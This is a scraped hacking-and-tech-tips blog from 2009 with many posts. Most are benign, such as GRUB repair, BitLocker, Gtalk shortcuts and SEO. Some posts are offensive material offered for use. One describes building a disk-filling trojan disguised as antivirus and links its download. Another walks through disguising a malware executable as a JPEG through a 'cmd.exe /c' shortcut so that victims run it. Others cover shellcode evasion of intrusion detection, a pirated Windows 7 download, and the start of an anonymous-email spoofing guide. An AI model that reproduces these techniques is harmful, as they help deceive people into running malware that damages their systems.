now a message will come { Diskpart Removed the Drive letter }
sometime it requires the reboot the computer .

Diskpart will remove the letter .Windows XP is not having capabilty to
identify the unkown volume.

Don’t afraid ur Data will ramin same .To Come back the Drive
repeat the process .But in 4th step which is shown in this
post replace ” remove” to “assign” means type ” assign letter E”
without quote The above method won’t work for the drive containing
Operating System and it can also be done using
System Manager;Storage Manager.

SHELLCODES - A QUICK REFERENCE FOR BEGINNERS

2009-09-04T23:22:00.000+05:30

SHELLCODE :

Shellcode is a snippet of machine code used as a payload during the exploitation of a software bug. During the modification of a particular program’s stream or flow rate, shellcodes become the protraction of the program. Shellcodes are commonly used during the implementation of software vulnerabilities like Stack Overflows, Heap Overflows, Integer Array Overflows, File Stream Overflows and Format String Attacks.

Shellcodes are really handy during the exploitation of local application bug. Basically, it helps the attacker in getting access to the victim’s box. Accession to the system is provided by the following ways:

By spawning victim’s local shell (either /bin/sh or cmd.exe)
By binding a shell to a specific remote shell
By adding a user with root privileges to the victim’s box

DEFENSE AGAINST SHELLCODES :

To defend a particular system from the effectuation of shellcodes, vendors have initiated developed several strong defenses against shellcode. Let enlist the most common defenses adopted by the white hats to counter shellcodes:

1)Intrusion Detection Systems: Mainly three different types of Intrusion Detection System:

NIDS: Network IDS grabs network datagrams from the ongoing network traffic and analyzes attack patterns. It uses the Wire Diagnosing method. Let me elucidate this part.

Wire Diagnose scrutinizes ongoing network traffic before reaching the source destination.
It scrutinizes for known attack patterns.
Intensity of this method depends on the nature of the rules amassed by the administrator.

NIDS also utilizes method called Runtime Diagnose. A bit explanation about this method:

Assesses the output generated after the execution of a particular code.
Usually checks the output for known attack patterns.

HIDS: Host IDS analyzes attack patterns in actions committed by the local user.

AIDS: Application IDS analyzes all types of input data diffused into an application

2)Intrusion Prevention System: Sandbox

3) Different Buffer Size: Protocol enforces different buffer sizes.

4) Standard Path Transfer: Transfer of important file paths. *nix variants and BSD allows users to reorganize the system layout.
An obstruction a restriction that bars the implementation of shellcodes is the size limitation.

How Shellcodes break these defenses

Shellcodes allow the attacker to execute almost anything they wish to do. The attacker only has to concentrate on the coding part. Anyway, let enlist some steps used by attackers to counter the defenses I mentioned in the previous section:

1) Wire Diagnosing Method: This method can be easily compromised by the following techniques:

Polymorphism aka Shellcode Encoding: Masquerades the bytes by Shellcode Encoding. The encoding can later be decoded.

Tunneling through VPN/SSL: This technique makes the payload almost impossible to decode.

2) Runtime Diagnose Method: This method can be easily compromised by the following technique:

Anti-Debug: Emplaces Anti-debug tricks into the shellcode to counter debugging options.

3) Countering Size Limitations: Partitioning special operations into smaller segments that permit you to create a program channel.

2 HIDDEN WAYS TO GET MORE FROM GMAIL ADDRESS

2009-09-04T20:47:00.000+05:30

Some little known ways to use your Gmail address that can give you greater control over your inbox and save your some time and headache. When you choose a Gmail address, you actually get more than just "yourusername@gmail.com." Here are two different ways you can modify your Gmail address and still get your mail.

Append a plus ("+") sign and any combination of words or numbers after your email address. For example, if your name was piyushfan@gmail.com, you could send mail to piyushfan+friends@gmail.com or piyushfan+mailinglists@gmail.com.

Insert one or several dots (".") anywhere in your email address. Gmail doesn't recognize periods as characters in addresses -- we just ignore them. For example, you could tell people your address was piyush.fan@gmail.com, piyush.fan@gmail.com or pi.yu.shfan@gmail.com.

The real value in being able to manipulate your email address is that it makes it really easy to filter on those variants. For example you could use piyushfan+bank@gmail.com when you sign up for online banking and then set up a filter to automatically star, archive or label emails addressed to piyushfan+bank. You can also use this when you register for a service and think they might share your information.

RECOVERING LINUX AFTER WINDOWS INSTALL

2009-09-02T02:07:00.000+05:30

It has always been a very common problem among the users when they install Windows after LINUX, The master boot records from the memory are Lost and they are writed for windows only systems, So here is the way to write Master boot records or rather installing grub again so that LINUX gets back to work

1. Boot the Desktop/Live CD.
2. Open a terminal (Applications -> Accessories -> Terminal)
3. Start grub as root with the following command :
* sudo grub
4. You will get a grub prompt (see below) which we will use to find the root partition and install grub to the MBR (hd0,0)
* [ Minimal BASH-like line editing is supported. For
the first word, TAB lists possible command
completions. Anywhere else TAB lists the possible
completions of a device/filename. ]
grub>
Type the following and press enter:
find /boot/grub/stage1
Using this information, set the root device:
grub> root (hd0,1)
Install Grub:
grub> setup (hd0)
Exit Grub:
grub> quit
5. Reboot (to hard drive). Grub should be installed and both Linux (e.g.Ubuntu) and Windows should have been automatically detected.
6. If, after installing grub, Windows will not boot you may need to edit /boot/grub/menu.lst (That is a small “L” and not the number 1 in menu.lst)
* Open a terminal and enter :
gksu gedit /boot/grub/menu.lst
Or, in Kubuntu:
kdesu kate /boot/grub/menu.lst
Your Windows stanza should look something like this :
title Windows XP/Vista # You can use any title you wish, this will appear on your grub boot menu
rootnoverify (hd0,0) #(hd0,0) will be most common, you may need to adjust accordingly
makeactive
chainloader +1

FIND DOMAIN INFORMATION

2009-09-01T01:07:00.000+05:30

Ever find yourself needing to acquire information about a particular domain but want an easy way to do it? Now you can with Win32Whois.
Setup
Getting started with Win32Whois is extremely simple. There is no install process to deal with, just place the exe file in a location of your choice and create a shortcut . When you start Win32Whois . To get started, enter the domain address that you are curious about and click “Go”.
For our example, we entered “www.example.com”. The results came up very quickly and as you can see by the scrollbar, there was quite a bit of information returned .
Conclusion
Win32Whois can provide a quick and easy way to find the information that you need about a domain. This is definitely a nice reference tool to have on your system or USB drive.
Links
Download Win32Whois (version 0.9.14)

BITLOCKER TO GO ENCRYPTS PORTABLE FLASH DRIVES IN WINDOWS7

2009-08-28T07:17:00.000+05:30

The BitLocker feature was introduced in Windows Vista and
allowed you to encrypt the content of your hard drive.Now in
Windows 7 they offer BitLocker To Go which allows you to
encrypt portable USB flash drives.First open up My Computer
and Right-click on the flash drive you want to encrypt and select
Turn on BitLocker.

After BitLocker initialized the flash drive you will need to enter
in a password to unlock the drive. You can also set up a
Smartcard which are usually used in a work environment so
talk to you IT staff.

Next you will be prompted to store the recovery key which is used
in the event you lose your password or smartcard. If you store it
as a file make sure that it is not on the same drive that you’re encrypting.

After the key has been saved as a file or printed you will see a
confirmation message.

Finally you will be ready to start encrypting the drive so just click
the Start Encrypting button.

While it is encrypting there will be a progress screen displayed.

A successful encryption of the USB flash drive. notice that the
drive icon will change to show its encrypted with BitLocker.

Notice that the drive icon will change to show its encrypted with
BitLocker where the gold lock indicates it is locked up and the
gray lock is displayed after you have unlocked it.

Right-click on that icon to bring up options to manage BitLocker encryption.

The next time you plug in the drive to a Windows 7 machine you will
be prompted to enter the password to gain access to the drive. You
can also always have it unlocked on specific machines in the future.

You can also use the encrypted drive in Vista and XP. Here we will
look at how it looks in XP, when you plug it in you will be prompted
for the password to launch BitLocker To Go Reader (the utility is
installed automatically on the drive by Windows 7).

BitLocker To Go Reader is a Windows Explorer type navigation
utility for showing the content of the drive.

With a BitLocker encrypted drive you will only be able to read and
copy files. If you need to add files or change them you will need to
use a Windows 7 machine.

This is a great way to easily make sure sensitive data on your USB flash
drive is safe. Right now anyone who has Windows 7 RC1 Ultimate can use this feature.

ACCESS HIDDEN REGIONAL THEMES IN WINDOWS 7

2009-08-28T00:03:00.002+05:30

Windows 7 offers you location specific Aero themes based on the language and location you pick during installation. Here we will take a look at accessing other hidden themes from different countries.
When you first start the Windows 7 installation the first thing you will do is select a language, time and currency format. This is where Windows determines what themes you’re presented with by default.

I am just giving a example for u....

To access the other international themes copy and paste the following path into the search box and hit Enter.

C:\Windows\Globalization\MCT

In the MCT folder you will find additional themes for Canada, Australia, South Africa, and Great Britain.

You can go in and grab just the Wallpapers…

Or go into the Theme folder double click on the the thumbnail to add it.

Here you can see I added all of them and now they will be available under the My Themes section for when you want to change them around.

This is a neat little trick that will let you customize Windows 7 with hidden themes already available. Also if you want to get more themes head over to the Microsoft site.

FREE DOMAIN FOR WEBSITE AND BLOG

2009-08-24T03:33:00.000+05:30

http://www.freedomain.co.nr/
http://www.dot.co.sr/
http://www.uni.cc/
http://www.cjb.net/
http://www.dot.tk/
http://www.da.ru/
http://www.nic.de.vu/
http://www.joynic.com/
http://www.unonic.com/
http://www.free-url-redirection.com.ru/
http://je.ro/en/
http://www.active.ws/domains/
http://www.smartdots.com/register/?LANG=US
http://moo.no
http://www.no-ip.com
http://www.4-all.org
http://www.pt.vu
http://www.rd5.net/
http://www.rg3.net
http://www.vai.la/
http://www.1br.net/
http://en.mylivepage.com/
http://freewebs.com
http://bravehost.com
http://dostweb.com
http://de.vu
http://us.tt
http://uk.tt
http://ca.tt
http://eu.tt
http://es.tt
http://fr.tt
http://it.tt
http://se.tt
http://dk.tt
http://be.tt
http://de.tt
http://at.tt
http://cx.la
http://de.gg
http://de.pn
http://de.tp
http://de.be
http://de.hm
http://de.nr
http://de.md
http://de.tt
http://de.ms
http://de.tc
http://de.tf
http://ch.tp
http://ch.pn
http://ch.gg
http://at.tp
http://at.pn
http://at.md
http://at.gg
http://elite.to
http://warez.by
http://warez.to
http://t3.to
http://hitz.to
http://redir.to
http://war3z.to
http://quality.by
http://appz.by
http://stuff.by
http://upload.by
http://gfx.by
http://user.by
http://crackz.by
http://dl.am
http://us.pn
http://us.mn
http://us.ms
http://us.tt
http://us.tf
http://us.tc
http://fr.mn
http://fr.pn
http://fr.ms
http://fr.tt
http://uk.pn
http://uk.mn
http://uk.tt
http://uk.md
http://ru.tf
http://ru.tc
http://ru.md
http://pl.tf
http://pl.tc
http://es.tc
http://es.tt
http://es.md
http://it.tc
http://it.mn
http://it.pn
http://cn.ms
http://cn.mn
http://cn.pn
http://jp.md
http://jp.pn
http://net.tf
http://net.tc
http://net.ms
http://info.ms
http://biz.md
http://eu.pn
http://eu.tp
http://eu.tf
http://eu.tc
http://edu.tf
http://u.tco.nr
http://box.ag
http://all.at
http://back.to
http://beam.at
http://been.at
http://bite.to
http://board.to
http://bounce.to
http://bowl.to
http://break.at
http://browse.to
http://change.to
http://chip.ms
http://connect.to
http://crash.to
http://cut.by
http://direct.at
http://dive.to
http://drink.to
http://drive.to
http://drop.to
http://easy.to
http://everything.at
http://fade.to
http://fanclub.ms
http://firstpage.de
http://fly.toflying.to
http://forward.to
http://fullspeed.to
http://fun.ms
http://gameday.de
http://germany.ms
http:// get.to
http://getit.at
http://hard-ware.de
http://hello.to
http://hey.to
http://hop.to
http://how.to
http://hp.ms
http://jump.to
http://kiss.to
http://listen.to
http://mediasite.de
http://megapage.de
http://messages.to
http://mine.at
http://more.at
http://more.by
http://move.to
http://musicpage.de
http://mypage.org
http://mysite.de
http://nav.to
http://notrix.at
http://notrix.ch
http://notrix.de
http://notrix.net
http://on.to
http://page.to
http://pagina.de
http://played.by
http://playsite.de
http://privat.ms
http://quickly.to
http://redirect.to
http://rulestheweb.com
http://run.to
http://scroll.to
http://seite.ms
http://shortcut.to
http://skip.to snap.to
http://soft-ware.de
http://start.at
http://stick.by
http://surf.to
http://switch.to
http://talk.to
http://tip.nu
http://top.ms
http://transfer.to
http://travel.to
http://turn.to
http:// vacations.to
http:// videopage.de
http://virtualpage.de
http://w3.to
http://walk.to
http://warp9.to
http://window.to
http://yours.at
http://zap.to
http://zip.to
http://meine-erste-homepage.com/subdomain.php
http://gratisdinge.de/kostenlos/kostenlose-domain.php
http://kostenlose-domain.de.cx/webspace.shtml
http://r-ene.de/kostenloses/domain.php
http://mailde.de
http://subdomain.tv
http://dx.am
http://orgfree.com
http://ueuo.com
http://altervista.org
http://funpic.org
http://host.sk

HOW TO MAKE TROJANHORSE

2009-08-23T15:02:00.001+05:30

Most of you may be curious to know about how to make Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The Trojan is available for download along with the source code at the end of this post. Let’s see how this Trojan works…
Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.
Now lets move to the working of our Trojan
The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.
The algorithm of the Trojan is as follows
1. Search for the root drive
2. Navigate to WindowsSystem32 on the root drive
3. Create the file named “spceshot.dll”
4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full
5. Once the drive is full, stop the process.
You can download the Trojan along with it’s source code HERE.

How to compile, test and remove the damage?

Compilation:
You can use Borland C++ compiler (or equivalent) to compile the Trojan.
Testing:
To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.
NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.
How to remove the Damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box.
%systemroot%system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

CONVERTING .EXE FILE TO .JPG FILE

2009-08-23T09:14:00.000+05:30

1. Firstly, create a new folder and make sure that the options 'show hidden files' is checked and ‘hide extensions for known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on your pc.
2. Paste a copy of your server on the new created folder. let's say it's called server.exe
(that's why you need the extension of files showing, cause you need to see it to change it)
3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg
4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
5. Now create a shortcut of this picture.jpeg in the same folder.
6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.
7. Go to properties (on file me.jpeg) and now you need to do some changes there.
8. First of all delete all the text on field START IN and leave it empty.
9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u have to write this: C:\WINDOWS\system32\cmd.exe /c picture.jpeg)
10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you
gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?
11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the server will run.
12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK.
13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection from someone.
14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected
to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.
15. For me for example I always want the shortcut showing first so can be the first file to be opened.
So I rename the server to picture2.jpeg and the shortcut to picture 1.jpeg. This way the shortcut will show up first. If you set hidden properties to the server (picture.jpeg) then u don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a zip file or rar.
16. So the best way to send these files together to someone is compress them into zip or rar.
17.Inside the RAR or ZIP file you can see the files properties and even after all this work you can see that the
shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

GTALK AND ITS IMPORTANT SHORTCUT

2009-08-22T10:49:00.000+05:30

Gtalk is the Widley Used Messenger all over the Internet ,People are now switching to Gtalk slowly and slowly leaving yahoo messenger due to some enhanced feature.So its necessary for new gtalk users to know more about Gtalk ,for this we have created a short Gtalk Tutorials that will help users while surfing gtalk .
Send Bold Text: Text embedded between two * characters is displayed as bold text. Example: This is a *bold* statement.

Send Italics Text: Text embedded between two _(underscore) characters is displayed as italics text. Example: This is an _italics_ statement
Insert Line Breaks: If you want to have a message that spans multiple paragraphs, just hold shift and hit enter
Send mail: Press F9 to send a mail to the contact with whom you are chatting
Restore Google Talk Window: Press windows key + Esc to restore Google Talk
window from system tray.
Call a Contact: Press F11 to start a voice call with the chat contact and F12 to end the voice call

Switch Windows – Hitting tab will cycle through open windows. It will select minimized conversations, to expand them just hit enter. If you just want to cycle through IM’s and don’t care about the buddy list, control-tab will do that and will automatically expand a minimized conversation if you settle on one.
Length Of A Single Message – A message can be max 32767 characters long.
Use Keyboard shortcuts while talking in Gtalk ,It will make yours work fast and talk Easy ,Below are some keyboard shortks for Gtalk User.

Ctrl + 5 (KeyPad) - Selects all the text typed.
Ctrl + 1 (NumPad) - It goes at the end of the last line.
Ctrl + 7 (NumPad) - It goes at the begin of the last line.
Ctrl + F4 – It closes the current window.
Alt + F4 - It closes the current window.
Alt + Esc – It Minimize the current open window.
Windows + ESC – Open Google Talk (if it’s minimized, or in the tray).
F9 - Open Gmail to send an email to the current contact.

Nickname Status Message:You can’t change your nickname in a way that other people will see it change. Every nickname in the Google Talk contactlist is the part that is before gmail.com (only the alphabetical characters are used) or the name you chosen for your GMail account. To change the nickname need to go to your Gmail account and change the name there. Choose Settings, Accounts, and then Edit info. Click on the second radio button, and enter your custom name. As a result all of your emails will have that nick as well, there is no way to seperate the two. You can add a website in your custom message, it will be clickable when someone opens a conversation window with you.

F11 – It initiates a telephonic call with your friend.
F12 – It cancels a telephonic call.
Esc – It closes the current window

How To Make Conference Calls:To have conference calls in Gtalk: Open up a copy of Google Talk on all computers with which you wish to conference. After one copy is opened make a new shortcut for Google Talk but at the end of the target add /nomutex. If you installed it to the default folder then your shortcut should read

“C:\Program Files\Google\Google Talk\googletalk.exe” /nomutex.

Open Second instance of the software on every user’s computer.After this start a chain: User 1 should connect on one instance to user 2. User 2 will connect on his second instance to user 3. User 3 will connect using his second instance back to user 1. With this chain everyone is connected to everyone.
Login to multiple Google Talk accounts simultaneously with a very easy hack. Follow these steps

Create a shortcut of Google Talk messenger on your desktop or any other preferred location .(To create a shortcut, right click on your Google Talk messenger application and select Send To–>Desktop(create shortcut) )
Right click on the Google Talk messenger icon and select Properties option
Modify target location text “c:\program files\google\google talk\googletalk.exe” /startmenu to

“c:\program files\google\google talk\googletalk.exe” /nomutex

Click Ok and you are done with this .

Contacts: Don’t need to say yes or no when someone wants to add you as a friend; you can simply ignore it, the request will go away. (On the other hand, someone with whom you chat often will automatically turn to be your friend, unless you disable this).

HOW DOES WORM WORKS

2009-08-21T14:39:00.000+05:30

People use e-mail more than any other application on the internet, but it can be a frustrating experience, with spam and especially e-mail worms filling our inboxes.Worms can spread rapidly over computer networks, the traffic they create bringing those networks to a crawl. And worms can cause other damage, such as allowing unauthorized access to a computer network, or deleting or copying files.

What's a worm?

A worm is a computer virus designed to copy itself, usually in large numbers, by using e-mail or other form of software to spread itself over an internal network or through the internet.

How do they spread?

When you receive a worm over e-mail, it will be in the form of an attachment, represented in most e-mail programs as a paper clip. The attachment could claim to be anything from a Microsoft Word document to a picture of tennis star Anna Kournikova (such a worm spread quickly in February 2001).

If you click on the attachment to open it, you'll activate the worm, but in some versions of Microsoft Outlook, you don't even have to click on the attachment to activate it if you have the program preview pane activated. Microsoft has released security patches that correct this problem, but not everyone keeps their computer up to date with the latest patches.

After it's activated, the worm will go searching for a new list of e-mail addresses to send itself to. It will go through files on your computer, such as your e-mail program's address book and web pages you've recently looked at, to find them.

Once it has its list it will send e-mails to all the addresses it found, including a copy of the worm as an attachment, and the cycle starts again. Some worms will use your e-mail program to spread themselves through e-mail, but many worms include a mail server within their code, so your e-mail program doesn't even have to be open for the worm to spread.

Other worms can use multiple methods of spreading. The MyDoom worm, which started spreading in January 2004, attempted to copy infected files into the folder used by Kazaa, a file-sharing program. The Nimda worm, from September 2001, was a hybrid that had four different ways of spreading.

What do they do?

Most of the damage that worms do is the result of the traffic they create when they're spreading. They clog e-mail servers and can bring other internet applications to a crawl. But worms will also do other damage to computer systems if they aren't cleaned up right away. The damage they do, known as the payload, varies from one worm to the next. The MyDoom worm was typical of recent worms. It opened a back door into the infected computer network that could allow unauthorized access to the system. It was also programmed to launch an attack against a specific website by sending thousands of requests to the site in an attempt to overwhelm it.

The target of the original version of MyDoom attack was the website of SCO Group Inc., a company that threatened to sue users of the Linux operating system, claiming that its authors used portions of SCO's proprietary code. A second version of MyDoom targeted the website of software giant Microsoft.

The SirCam worm, which spread during the summer of 2001, disguised itself by copying its code into a Microsoft Word or Excel document and using it as the attachment. That meant that potentially private or sensitive documents were being sent over the internet.

How do I get rid of them?

The best way to avoid the effects of worms is to be careful when reading e-mail. If you use Microsoft Outlook, get the most recent security updates from the Microsoft website and turn off the preview pane, just to be safe.

Never open attachments you aren't expecting to receive, even if they appear to be coming from a friend. Be especially cautious with attachments that end with .bat, .cmd, .exe, .pif, .scr, .vbs or .zip, or that have double endings. (The file attachment that spread the Anna Kournikova worm was AnnaKournikova.jpg.vbs.)

Also, install anti-virus software and keep it up to date with downloads from the software maker's website. The updates are usually automatic.

Users also need to be wary of e-mails claiming to have cures for e-mail worms and viruses. Many of them are hoaxes that instruct you to delete important system files, and some carry worms and viruses themselves.

As well, some users should consider using a computer with an operating system other than Windows, the target of most e-mail worms. Most of the worms don't affect computers that run Macintosh or Linux operating systems.

WINDOWS 7

2009-08-21T14:13:00.000+05:30

Windows 7 includes a number of new features, such as advances in touch, speech, and handwriting recognition, support for virtual hard disks, improved performance on multicore processors, improved boot performance, and kernel improvements.

Windows 7 adds support for systems using multiple heterogeneous graphics cards from different vendors, a new version of Windows Media Center, Gadgets being integrated into Windows Explorer, a Gadget for Windows Media Center, the ability to visually pin and unpin items from the Start Menu and Taskbar, improved media features, the XPS Essentials Pack being integrated, Windows PowerShell Integrated Scripting Environment (ISE), and a redesigned Calculator with multiline capabilities including Programmer and Statistics modes along with unit conversion.

Many new items have been added to the Control Panel including: ClearType Text Tuner, Display Color Calibration Wizard, Gadgets, Recovery, Troubleshooting, Workspaces Center, Location and Other Sensors, Credential Manager, Biometric Devices, System Icons, Action Center, and Display. Windows Security Center has been renamed the Windows Action Center (Windows Health Center and Windows Solution Center in earlier builds) which encompasses both security and maintenance of the computer.

The taskbar has seen the biggest visual changes, where the Quick Launch toolbar has been merged with the task buttons to create an enhanced taskbar or what Microsoft internally refers to as the "Superbar". This enhanced taskbar also enables the Jump Lists feature to allow easy access to common tasks.The revamped taskbar also allows the reordering of taskbar buttons.

Screenshots have appeared demonstrating a new feature called 'Peek'. Peek is a quick way of making all visible windows transparent for a quick look at the desktop. A Microsoft spokesman said that "this will be useful for users who want a quick look at the news" in reference to RSS gadgets on the desktop.

For developers, Windows 7 includes a new networking API with support for building SOAP based web services in native code (as opposed to .NET based WCF web services),new features to shorten application install times, reduced UAC prompts, simplified development of installation packages, and improved globalization support through a new Extended Linguistic Services API.

OS: Microsoft Windows 7 Original
Type of File: WinRaR
Size: 2.14 GB AFTER EXTRACTING!

How to Install:
1. Extract the rar archive....
2. Burn on a DVD
3. Now Boot and Install Just like Vista

Minimum recommended specs call for:
1. 1 GHz 32-bit or 64-bit processor
2. 1 GB of system memory
3. 16 GB of available disk space
4. Support for DirectX 9 graphics with 128 MB memory (to enable the Aero theme)
5. DVD-R/W Drive
6. Internet access to get updates

Features of Windows 7
Easier
Windows 7 will make it easier for users to find and use information. Local, network and Internet search functionality will converge.
More Secure
Windows 7 will include improved security and legislative compliance functionality.
Better Connected
Windows 7 will further enable the mobile workforce. It will deliver anywhere, anytime, any device access to data and applications
Lower Cost
Windows 7 will help businesses optimize their desktop infrastructure. It will enable seamless OS, application and data migration, and simplified PC provisioning and upgrading.

Download Window 7 Part 1

Download Window 7 Part 2

Download Window 7 Part 3

WINDOWS 7 CHEAT SHEET

2009-08-21T13:49:00.001+05:30

From Desktop

Windows Key + Tab : Aero [press Tab to cycle between Windows]
Windows Key + E : Windows Explorer is launched.
Windows Key + R : Run Command is launched.
Windows Key + F : Search (which is there in previous Windows versions too)
Windows Key + X : Mobility Center
Windows Key + L : Lock Computer (It is there from the earlier versions as well)
Windows Key + U : Launches Ease of Access
Windows Key + P : Projector
Windows Key + T : Cycle Super Taskbar Items
Windows Key + S : OneNote Screen Clipping Tool [requires OneNote]
Windows Key + M : Minimize All Windows
Windows Key + D : Show/Hide Desktop
Windows Key + Up : Maximize Current Window
Windows Key + Down : Restore Down / Minimize Current Windows
Windows Key + Left : Tile Current Window to the Left
Windows Key + Right : Tile Current Windows to the Right
[Continue pressing the Left and Right keys to rotate the window as well]
Windows Key + # (# is any number) : Quickly Launch a new instance of the application in the Nth slot on the taskbar. Example Win+1 launches first pinned app, Win+2 launches second, etc.
Windows Key + = : Launches the Magnifier
Windows Key + Plus : Zoom in
Windows Key + Minus : Zooms out
Windows Key + Space : Peek at the desktop

From Windows Explorer

22. Alt + Up : Go up one level
23. Alt + Left/ Right : Back/ Forward
24. Alt + P : Show/hide Preview Pane

Taskbar modifiers

25. Shift + Click on icon : Open a new instance
26. Middle click on icon : Open a new instance
27. Ctrl + Shift + Click on icon : Open a new instance with Admin privileges
28. Shift + Right-click on icon : Show window menu (Restore / Minimize / Move / etc). Note: Normally you can just right-click on the window thumbnail to get this menu.
29. Shift + Right-click on grouped icon : Menu with Restore All / Minimize All / Close All, etc.
30. Ctrl + Click on grouped icon : Cycle between the windows (or tabs) in the group
Though some of them are there in previous versions of Windows, Windows 7 has incorporated many of them and have started many afresh.

SCAN FILE OR WEBSITE FOR VIRUS WITHOUT DOWNLOADING IT

2009-08-21T05:34:00.000+05:30

This is very help full website for those who want to check the files for virus
with out downloading it to your own computer.Now a days most of the
hacking tools and also some of the files that our trusted friends sends may
contain key loggers or virus .
NoVirusThanks, a website that offers free service to analyze your file with
22 AntiVirus Engines and will report back the analysis result .It introduced
a new feature to scan the website contain any files with virus or any
miscellaneous software or any drive -by-download attacks.It can scan
php,.html.,js, sites.The main advantage is it saves your bandwidth and also
time but the main drawback is this can scan only files maximum of 20 mb.

9 SEO TIPS TO INCREASE GOOGLE SEARCH RANK

2009-08-21T03:16:00.000+05:30

I have listed 9 onpage SEO optimization tips to help you improve your google rankings. Just implement these SEO tips and see your search engine rankings boosting and hence traffic increasing.

Onpage optimization to increase Google ranking:

The 9 tips to improve google ranking are given as:
1. Keywords :
Keywords are the words used by users to search for results. So, use of right keywords in posts help in increasing google rank and thus attracting high traffic from search engines. You can use Google adwords or various keyword softwares to track proper keywords that suit your article.
2. Title :
It is title that is seen first by search engine spiders rather than article body. So, use of right keywords in article title helps in increasing site traffic from search engine.
3. Header tags :
This is very important part of onpage optimisation, which i was neglecting so long. These header tags h1, h2,h3,h4 are used to indicate title and subtitles according to their hierarchies.
4. Strong and em tags :
Use strong and em tags to highlight content. Also, what is more advantageous is , these strong and em tags are used to inform spiders “what the content is about”. So, use strong and em tags for keywords. But, dont overuse them.
5. Image alt tags :
Generally, while including image in post, we just enter image tag with its source (img src=””). Alongwith this, include alt tags which tell search engine spiders about what image is actually about. Try using keywords in alt tags.
6. Anchor text :
While using links in posts, it is general practice to use “here” or “site” as anchor text. For example, to provide a download link to software, one use “Download here” as anchor text. But, it would be better if you use “Download software here” as anchor text.
7. Title tags :
When anchor text is optimized, its time to look at title tags. Title tags come in role when you hover mouse over a link and content of title tags are displayed without user clicking link. This title tag is used to inform search engine spiders about site you are linking to. So, why not use this title tag to include keywords??? So, title tags with keywords help in SEO.
8. New unique content :
It is my general observation that search engine prefers new content than redundant copied content. So, try out your innovation to write on new topics or if you dont have new topic, just develop your own way of presenting the topic and remember “NEVER COPY”. Yes, you can use other articles to get ideas on subject but dont be a copycat. You are a BLOGGER and not a Copycat.
9. Start and end :
Usually, it is seen that stuffing keywords at start and end of article increases chances of getting high search engine rank. So, it is beneficial to use keywords at start and end of article.
Guys, just try out these tricks and you’ll find your google traffic increasing. These tips have helped me a lot in getting google hits. I hope they may help you. If you know any SEO tricks not mentioned in article, but has helped you in getting google traffic, please mention it in comments section.

HIDE YOUR IP ADDRESS

2009-08-20T22:20:00.001+05:30

IP address is same as your postal address in internet.But, while performing these hacking tricks you must be anonymous so that your IP address cannot be detected. Thus, it is necessary to hide IP address to maintain online privacy. Hence, I am writing this article on how to hide your ip address using Hide my ip to inform you the method used to hide IP address. I have also provided link for Hide my IP software download.

Hide my IP is proxy software used to hide IP address while internet browsing. It assigns its own proxy addresses so that you are able to mask or hide IP address.
1. Download Hide my IP software to hide IP address.
2. Unzip the file using Winzix (free download here) to obtain Hide My IP software.
3. Go to http://www.whatismyip.com and check your IP address.(show your ip)
4. Install software Hide my IP on your computer.
5. Now, open Hide my IP control panel by double clicking on Hide my IP icon in taskbar and hit “Hide my IP”. Hide my IP software will search for available fast proxy servers for you and will automatically hide IP address by changing it.
6. Now, go to http://www.whatismyip.com and again see your changed IP address.
Thus, you can now use Hide my IP software to hide IP address. Hide my IP is really useful as it provides you with fast proxy servers and also you are able to hide IP address.

SEND ANONYMOUS EMAILS A GREAT TECHNIQUE.

2009-08-17T17:03:00.000+05:30

Sometimes it is necessary to send an email anonymously.
There are several web based utilities that allow this, but each one registers the ip info in the headers which allows tracing. They also will not allow you to use a proxy and utilize their service. This is for security reasons.

Address you specify as well as no accurate record of your IP in the headers of the mail that could be traced back to you.
The method that follows supports my definition of anonymous.Amazingly, all you need to accomplish this is telnet and a SMTP server. Allow me to break it down.

My definition of anonymous includes the email addresses appearing as if they have been sent from whatever Telnet is a software application that connects one machine to another, allowing you to log on to that other machine as a user.
If you don't have telnet, you can easily download it for free from the web - do a search on "telnet" or "download telnet” in any search engine.
...and just for the sake of being thorough...
What is SMTP?
SMTP stands for "Simple Mail Transfer Protocol"
Basically just a protocol for sending e-mail.

Where do you get a SMTP server?
